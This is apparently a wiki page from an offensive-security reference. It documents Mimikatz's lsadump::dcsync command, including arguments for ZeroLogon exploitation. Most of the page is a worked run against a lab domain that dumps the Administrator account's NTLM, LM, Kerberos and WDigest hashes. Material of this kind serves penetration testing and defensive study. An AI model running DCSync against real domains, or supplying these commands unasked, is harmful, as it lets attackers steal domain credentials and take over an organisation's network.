dcsync
lsadump::dcsync can be used to do a DCSync and retrieve domain secrets. This command uses the Directory Replication Service Remote protocol (MS-DRSR) to request from a domain controller to synchronize a specified entry. It's the same protocol that domain controllers are using between them. It has the following command line arguments:
  • /all : It will DCSync the entire active directory database
  • /user: perform syncing only for the specified user
  • /export : Save the output
  • /csv : export to csv
  • /dc or /kdc: Specify the Domain Controller to connect to and gather data
  • /guid : The GUID of the object to sync credentials. It can be obtained with net::trust.
The following command line arguments of lsadump::dcsync can be used for ZeroLogon exploitation:
  • /authuser: the domain controller's machine account
  • /authdomain: the NetBIOS of the domain
  • /authpassword: it has to be set to blank ""
  • /authntlm: user NTLM authentication
1
mimikatz # lsadump::dcsync /domain:hacklab.local /user:hacklab\Administrator
2
[DC] 'hacklab.local' will be the domain
3
[DC] 'DC.hacklab.local' will be the DC server
4
[DC] 'hacklab\Administrator' will be the user account
5
[rpc] Service : ldap
6
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
7
​
8
Object RDN : Administrator
9
​
10
** SAM ACCOUNT **
11
​
12
SAM Username : Administrator
13
Account Type : 30000000 ( USER_OBJECT )
14
User Account Control : 00000200 ( NORMAL_ACCOUNT )
15
Account expiration : 01/01/1601 01:00:00
16
Password last change : 24/09/2021 16:24:41
17
Object Security ID : S-1-5-21-2725560159-1428537199-2260736313-500
18
Object Relative ID : 500
19
​
20
Credentials:
21
Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7
22
ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7
23
ntlm- 1: a06b19f88e0432e937a67fb6848e56bd
24
lm - 0: b28dd7b27e8cf0d2293087d70fc35769
25
​
26
Supplemental Credentials:
27
* Primary:NTLM-Strong-NTOWF *
28
Random Value : a367950918bb2ccabb50ab88e8ffb09f
29
​
30
* Primary:Kerberos-Newer-Keys *
31
Default Salt : HACKLAB.LOCALAdministrator
32
Default Iterations : 4096
33
Credentials
34
aes256_hmac (4096) : 0c1230dca827b75e872b5e5601eb6b76016412b4dd96b4aeb99a59a43490182c
35
aes128_hmac (4096) : e52cb5008be21bfe2e8429c74659d925
36
des_cbc_md5 (4096) : 4f45e3a7cd34bc83
37
​
38
* Primary:Kerberos *
39
Default Salt : HACKLAB.LOCALAdministrator
40
Credentials
41
des_cbc_md5 : 4f45e3a7cd34bc83
42
​
43
* Packages *
44
NTLM-Strong-NTOWF
45
​
46
* Primary:WDigest *
47
01 6ca5712f90260e1eb3abd67598e6750a
48
02 8dffe5b3aefb6e5ae29e628d2ee96a45
49
03 17be46dc199faf9b0bbda5bad36e3d6e
50
04 6ca5712f90260e1eb3abd67598e6750a
51
05 6fc635e3af189352029ce83a2219fa3c
52
06 510782016677b838b585d4f04d23f98a
53
07 b358628b75f049cf9e78f5e49bc560a2
54
08 c40c4076a86fbf852da4cb4bfa721d74
55
09 bf6734b4833bd61834c48fa6533acb9a
56
10 3c148f6edbc99e9a489d72fb809ee66b
57
11 0a100f8d2212e336adf8c429722d3a8c
58
12 c40c4076a86fbf852da4cb4bfa721d74
59
13 e649568c12076eba2026544142dc74fd
60
14 3ef797336ba53aaf034774a4fe8b06dc
61
15 797740715ee8fa059260c583fef36d5e
62
16 84aa405aaf242960160143fa357a3c7f
63
17 bb9ea6391483fa61fba5dced60ea039c
64
18 3871d21dfa14ede3c56b04ffc5970b1c
65
19 8e7946ea6e13210cb3ded49e2ff501fa
66
20 7480b0f8878e31ee2dcf3507fc2dbf54
67
21 2f7b7c9a2ac171f4417a38a52ef89989
68
22 3483e4a4ca60cd4b3d0bc66dc900f175
69
23 e1fa4a98cdab50c99934120090885d90
70
24 e16cb6277ed064c290498037f5dfe5b3
71
25 d6b096727b0d7a39cae06afd874247a9
72
26 f7a5f95bb7f0d0be1d8fe247b875cb29
73
27 e781f3584bf099e0a485657e832c6e74
74
28 acb55c0b8828a6660b166fc649708c1c
75
29 8fd36767c074ca738a81d5c7298295c3
Copied!
When running lsadump::dcsync directly on the domain controller, it is not needed to specify the domain in the/user.
mimikatz # lsadump::dcsync /user:Administrator /domain:hacklab.local
Last modified 6mo ago
Copy link